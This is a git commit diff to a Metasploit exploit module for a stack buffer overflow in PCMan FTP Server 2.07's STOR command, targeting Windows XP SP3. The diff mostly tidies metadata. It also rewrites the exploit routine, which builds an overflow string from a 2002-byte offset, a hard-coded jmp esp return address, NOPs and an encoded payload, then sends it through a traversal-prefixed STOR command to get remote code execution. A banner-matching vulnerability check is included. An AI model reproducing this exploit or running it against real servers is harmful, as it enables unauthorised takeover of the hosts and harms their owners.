added PCMan's FTP Server Crafted Multiple Command Handling Remote Buffer Overflow (OSVDB 94624)

2013-09-16 12:40:36 -07:00 · 2013-09-16 12:40:36 -07:00 · 82e3910959
parent 92cf886e49
commit 82e3910959
1 changed files with 17 additions and 17 deletions
--- a/modules/exploits/windows/ftp/pcman_stor_msf.rb
+++ b/modules/exploits/windows/ftp/pcman_stor_msf.rb
@ -11,10 +11,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking

 	include Msf::Exploit::Remote::Ftp
-
+	
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'PCMAN FTP Server STOR Command Stack Buffer Overflow',
+			'Name'           => 'PCMAN FTP Server STOR Command Stack Overflow',
 			'Description'    => %q{
 						This module exploits a buffer overflow vulnerability
 						found in the STOR command of the PCMAN FTP v2.07 Server
@ -22,14 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         => [
 						'Christian (Polunchis) Ramirez',	# Initial Discovery
-						'Rick (nanotechz9l) Flores',		# Metasploit Module
+						'Rick (nanotechz9l) Flores',		# Metasploit Module                             
 					],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision: $',
 			'References'     =>
 				[
-					[ 'URL', 'http://osvdb.org/show/osvdb/94624'],
-					[ 'EDB', 'http://www.exploit-db.com/exploits/27703/'],
+					[ 'URL', 'http://www.exploit-db.com/exploits/27703/' ],
 				],
 			'DefaultOptions' =>
 				{
@ -37,27 +36,27 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Payload'        =>
 				{
-					'Space'		=> 1000,
-					'BadChars'	=> "\x00\xff\x0a\x0d\x20\x40",
+					'Space' 		=> 1000,
+					'BadChars' 		=> "\x00\xff\x0a\x0d\x20\x40",
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Windows XP SP3',
-						{
-							'Ret' => 0x7C91FCD8, # jmp esp ret from kernel32.dll
+					[ 'Windows XP SP3', 
+						{ 
+							'Ret' => 0x7C91FCD8, # jmp esp from kernel32.dll
 							'Offset' => 2002
-						}
+						} 
 					],
 				],
-			'DisclosureDate' => 'Jun 27 2013',
+			'DisclosureDate' => 'Jul 17 2011',
 			'DefaultTarget'	=> 0))
 	end
-
+	
 	def check
 	connect
 	disconnect
-	if (banner =~ /220 PCMan's FTP Server 2\.0/)
+	if (banner =~ /220 PCMan's FTP Server 2.0/)
 		return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
@ -65,9 +64,10 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit
 		connect_login
-		print_status("Trying victim #{target.name}...")
-		sploit = "\x41" * target['Offset'] << [target.ret].pack('V') << make_nops(4) << payload.encoded
-		sploit << rand_text_alpha(sploit.length)
+		print_status("Trying victim #{target.name}...")		
+		sploit = "\x41" * 2002 + [target.ret].pack('V') + make_nops(4) + "\x83\xc4\x9c" + payload.encoded
+		sploit << make_nops(4)
+		sploit << payload.encoded
 		send_cmd( ['STOR', '/../' + sploit], false )
 		handler
 		disconnect